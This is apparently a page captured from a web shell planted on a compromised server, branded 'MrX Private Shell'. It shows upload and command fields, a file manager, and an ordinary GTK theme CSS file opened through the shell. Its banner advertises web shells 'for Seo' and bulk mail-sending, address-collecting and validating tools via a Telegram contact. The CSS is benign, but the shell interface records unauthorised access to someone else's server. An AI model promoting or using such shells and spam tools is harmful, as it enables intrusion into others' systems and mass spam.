__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
/* Borders */
.menubar.menuitem:hover,
.menubar .menuitem:hover {
    border: 1px solid #2e2e2c;
    border-bottom-width: 0px;
    border-radius: 4px 4px 0 0;
}

/*********
 * entry *
 *********/
.entry {
    border-radius: 8px;
    border-width: 1px;
    border-style: solid;
    border-color: transparent;
}

.entry {
    border-image: -gtk-scaled(url("assets/entry.png"),url("assets/[email protected]")) 10 12 10 12 / 10px 12px 10px 12px stretch;
}

.entry:backdrop {
    border-image: -gtk-scaled(url("assets/backdrop-entry.png"),url("assets/[email protected]")) 10 12 10 12 / 10px 12px 10px 12px stretch;
}

.entry:focus {
    border-image: -gtk-scaled(url("assets/entry-focused.png"),url("assets/[email protected]")) 10 12 10 12 / 10px 12px 10px 12px stretch;
}

.entry:insensitive {
    border-image: -gtk-scaled(url("assets/entry-disabled.png"),url("assets/[email protected]")) 10 12 10 12 / 10px 12px 10px 12px stretch;
}

.entry:insensitive:backdrop {
    border-image: -gtk-scaled(url("assets/backdrop-entry-disabled.png"),url("assets/[email protected]")) 10 12 10 12 / 10px 12px 10px 12px stretch;
}

.primary-toolbar .entry,
.menubar.toolbar .entry,
.header-bar .entry {
    border-image: -gtk-scaled(url("assets/entry-toolbar.png"),url("assets/[email protected]")) 10 12 10 12 / 10px 12px 10px 12px stretch;
}

.primary-toolbar .entry:focus,
.menubar.toolbar .entry:focus,
.header-bar .entry:focus {
    border-image: -gtk-scaled(url("assets/entry-toolbar-focused.png"),url("assets/[email protected]")) 10 12 10 12 / 10px 12px 10px 12px stretch;
}

.primary-toolbar .entry.progressbar,
.primary-toolbar .entry.progressbar,
.menubar.toolbar .entry.progressbar,
.menubar.toolbar .entry.progressbar,
.header-bar .entry.progressbar,
.header-bar .entry.progressbar {
    border-radius: 8px;
    border-width: 0;
}

/******************
 * combobox entry *
 ******************/
GtkComboBox.combobox-entry .entry:first-child,
GtkComboBox.combobox-entry .button:first-child {
    border-image-width: 10px 1px 10px 12px;
    border-radius: 8px 0 0 8px;
    border-right-width: 0;
}

GtkComboBox.combobox-entry .entry:last-child,
GtkComboBox.combobox-entry .button:last-child {
    border-image-width: 10px 12px 10px 1px;
    border-radius: 0 8px 8px 0;
    border-left-width: 0;
}

GtkComboBox.combobox-entry .button {
    border-image: -gtk-scaled(url("assets/combobox-button.png"),url("assets/[email protected]")) 10 12 10 1 / 10px 12px 10px 1px stretch;
}

GtkComboBox.combobox-entry .button:backdrop {
    border-image: -gtk-scaled(url("assets/backdrop-combobox-button.png"),url("assets/[email protected]")) 10 12 10 1 / 10px 12px 10px 1px stretch;
}

GtkComboBox.combobox-entry .button:focus {
    border-image: -gtk-scaled(url("assets/combobox-button-focused.png"),url("assets/[email protected]")) 10 12 10 1 / 10px 12px 10px 1px stretch;
}

GtkComboBox.combobox-entry .button:insensitive {
    border-image: -gtk-scaled(url("assets/combobox-button-disabled.png"),url("assets/[email protected]")) 10 12 10 1 / 10px 12px 10px 1px stretch;
}

GtkComboBox.combobox-entry .button:insensitive:backdrop {
    border-image: -gtk-scaled(url("assets/backdrop-combobox-button-disabled.png"),url("assets/[email protected]")) 10 12 10 1 / 10px 12px 10px 1px stretch;
}

GtkComboBox.combobox-entry .button:active:focus {
    border-image: -gtk-scaled(url("assets/combobox-button-pressed-focused.png"),url("assets/[email protected]")) 10 12 10 1 / 10px 12px 10px 1px stretch;
}

.primary-toolbar GtkComboBox.combobox-entry .button,
.primary-toolbar GtkComboBox.combobox-entry .button:focus:insensitive,
.menubar.toolbar GtkComboBox.combobox-entry .button,
.menubar.toolbar GtkComboBox.combobox-entry .button:focus:insensitive,
.header-bar GtkComboBox.combobox-entry .button,
.header-bar GtkComboBox.combobox-entry .button:focus:insensitive {
    border-image: url("assets/combobox-button-toolbar.png") 10 12 10 1 / 10px 12px 10px 1px stretch;
}

.primary-toolbar GtkComboBox.combobox-entry .button:focus,
.menubar.toolbar GtkComboBox.combobox-entry .button:focus,
.header-bar GtkComboBox.combobox-entry .button:focus {
    border-image: url("assets/combobox-button-toolbar-focused.png") 10 12 10 1 / 10px 12px 10px 1px stretch;
}

.primary-toolbar GtkComboBox.combobox-entry .button:focus:active:focus,
.menubar.toolbar GtkComboBox.combobox-entry .button:focus:active:focus,
.header-bar GtkComboBox.combobox-entry .button:focus:active:focus {
    border-image: url("assets/combobox-button-toolbar-pressed-focused.png") 10 12 10 1 / 10px 12px 10px 1px stretch;
}

.primary-toolbar GtkComboBox.combobox-entry .entry:first-child,
.primary-toolbar GtkComboBox.combobox-entry .button:first-child,
.menubar.toolbar GtkComboBox.combobox-entry .entry:first-child,
.menubar.toolbar GtkComboBox.combobox-entry .button:first-child,
.header-bar GtkComboBox.combobox-entry .entry:first-child,
.header-bar GtkComboBox.combobox-entry .button:first-child {
    border-image-width: 10px 0 10px 12px;
    border-radius: 8px 0 0 8px;
    border-right-width: 0;
}

.primary-toolbar GtkComboBox.combobox-entry .entry:last-child,
.primary-toolbar GtkComboBox.combobox-entry .button:last-child,
.menubar.toolbar GtkComboBox.combobox-entry .entry:last-child,
.menubar.toolbar GtkComboBox.combobox-entry .button:last-child,
.header-bar GtkComboBox.combobox-entry .entry:last-child,
.header-bar GtkComboBox.combobox-entry .button:last-child {
    border-image-width: 10px 12px 10px 1px;
    border-radius: 0 8px 8px 0;
    border-left-width: 0;
}

.notebook tab.top:active {
    border-image: -gtk-scaled(url("assets/notebook-tab-top.png"),url("assets/[email protected]")) 8 10 1 10 / 8px 10px 1px 10px stretch;
}

.notebook tab.right:active {
    border-image: -gtk-scaled(url("assets/notebook-tab-right.png"),url("assets/[email protected]")) 10 8 10 1 / 10px 8px 10px 1px stretch;
}

.notebook tab.bottom:active {
    border-image: -gtk-scaled(url("assets/notebook-tab-bottom.png"),url("assets/[email protected]")) 1 10 8 10 / 1px 10px 8px 10px stretch;
}

.notebook tab.left:active {
    border-image: -gtk-scaled(url("assets/notebook-tab-left.png"),url("assets/[email protected]")) 10 1 10 8 / 10px 1px 10px 8px stretch;
}

.trough,
.trough.highlight {
    border-radius: 4px;
    border-width: 1px;
    border-style: solid;
    border-color: transparent;
}

.trough {
    border-image: -gtk-scaled(url("assets/progressbar-horizontal-trough.png"),url("assets/[email protected]")) 6 7 6 7 / 6px 7px 6px 7px stretch;
}

GtkSwitch.trough {
    border-image: -gtk-scaled(url("assets/switch-trough-off.png"),url("assets/[email protected]")) 10 12 10 12 / 10px 12px 10px 12px stretch;
}

GtkSwitch.trough:active {
    border-image: -gtk-scaled(url("assets/switch-trough-on.png"),url("assets/[email protected]")) 10 12 10 12 / 10px 12px 10px 12px stretch;
}

.primary-toolbar GtkSwitch.trough,
.menubar.toolbar GtkSwitch.trough,
.header-bar GtkSwitch.trough {
    border-image: -gtk-scaled(url("assets/switch-trough-toolbar-off.png"),url("assets/[email protected]")) 10 12 10 12 / 10px 12px 10px 12px stretch;
}

.primary-toolbar GtkSwitch.trough:active,
.menubar.toolbar GtkSwitch.trough:active,
.header-bar GtkSwitch.trough:active {
    border-image: -gtk-scaled(url("assets/switch-trough-toolbar-on.png"),url("assets/[email protected]")) 10 12 10 12 / 10px 12px 10px 12px stretch;
}

/* XXX temporary */
GtkSwitch.trough:backdrop,
GtkSwitch.trough:active:backdrop,
GtkSwitch.trough:insensitive,
GtkSwitch.trough:active:insensitive {
    border-image: -gtk-scaled(url("assets/switch-trough-disabled.png"),url("assets/[email protected]")) 10 12 10 12 / 10px 12px 10px 12px stretch;
}

GtkSwitch.slider {
    border-image: -gtk-scaled(url("assets/switch-button-off.png"),url("assets/[email protected]")) 9 11 9 11 / 9px 11px 9px 11px stretch;
}

GtkSwitch.slider:active {
    border-image: -gtk-scaled(url("assets/switch-button-on.png"),url("assets/[email protected]")) 9 11 9 11 / 9px 11px 9px 11px stretch;
}

/* XXX temporary */
GtkSwitch.slider:backdrop,
GtkSwitch.slider:insensitive {
    border-image: -gtk-scaled(url("assets/switch-button-off-disabled.png"),url("assets/[email protected]")) 9 11 9 11 / 9px 11px 9px 11px stretch;
}

/* XXX temporary */
GtkSwitch.slider:active:backdrop,
GtkSwitch.slider:active:insensitive {
    border-image: -gtk-scaled(url("assets/switch-button-on-disabled.png"),url("assets/[email protected]")) 9 11 9 11 / 9px 11px 9px 11px stretch;
}

.scale.trough {
    border-image: -gtk-scaled(url("assets/scale-horizontal-trough.png"),url("assets/[email protected]")) 2 6 2 6 / 2px 6px 2px 6px stretch;
}

.scale.trough:insensitive {
    border-image: -gtk-scaled(url("assets/scale-horizontal-trough-disabled.png"),url("assets/[email protected]")) 2 6 2 6 / 2px 6px 2px 6px stretch;
}

.scale.trough:backdrop {
    border-image: -gtk-scaled(url("assets/scale-horizontal-trough-backdrop.png"),url("assets/[email protected]")) 2 6 2 6 / 2px 6px 2px 6px stretch;
}

.scale.trough.vertical {
    border-image: -gtk-scaled(url("assets/scale-vertical-trough.png"),url("assets/[email protected]")) 6 2 6 2 / 6px 2px 6px 2px stretch;
}

.scale.trough.vertical:insensitive {
    border-image: -gtk-scaled(url("assets/scale-vertical-trough-disabled.png"),url("assets/[email protected]")) 6 2 6 2 / 6px 2px 6px 2px stretch;
}

.scale.trough.highlight.left {
    border-image: -gtk-scaled(url("assets/scale-horizontal-fill.png"),url("assets/[email protected]")) 2 6 2 6 / 2px 6px 2px 6px stretch;
}

.scale.trough.vertical:backdrop {
    border-image: -gtk-scaled(url("assets/scale-vertical-trough-backdrop.png"),url("assets/[email protected]")) 6 2 6 2 / 6px 2px 6px 2px stretch;
}

.scale.trough.highlight.left:insensitive {
    border-image: -gtk-scaled(url("assets/scale-horizontal-fill-disabled.png"),url("assets/[email protected]")) 2 6 2 6 / 2px 6px 2px 6px stretch;
}

.scale.trough.highlight.left:backdrop {
    border-image: -gtk-scaled(url("assets/scale-horizontal-fill-backdrop.png"),url("assets/[email protected]")) 2 6 2 6 / 2px 6px 2px 6px stretch;
}

.scale.trough.highlight.bottom.vertical {
    border-image: -gtk-scaled(url("assets/scale-vertical-fill.png"),url("assets/[email protected]")) 6 2 6 2 / 6px 2px 6px 2px stretch;
}

.scale.trough.highlight.bottom.vertical:insensitive {
    border-image: -gtk-scaled(url("assets/scale-vertical-fill-disabled.png"),url("assets/[email protected]")) 6 2 6 2 / 6px 2px 6px 2px stretch;
}

.scale.trough.highlight.bottom.vertical:backdrop {
    border-image: -gtk-scaled(url("assets/scale-vertical-fill-backdrop.png"),url("assets/[email protected]")) 6 2 6 2 / 6px 2px 6px 2px stretch;
}


Filemanager

Name Type Size Permission Actions
apps Folder 0755
assets Folder 0755
gtk-main.css File 3.31 KB 0644
gtk-widgets-assets.css File 23.66 KB 0644
gtk-widgets-borders.css File 10.81 KB 0644
gtk-widgets.css File 60.86 KB 0644
gtk.css File 28 B 0644
public-colors.css File 966 B 0644
settings.ini File 337 B 0644
Filemanager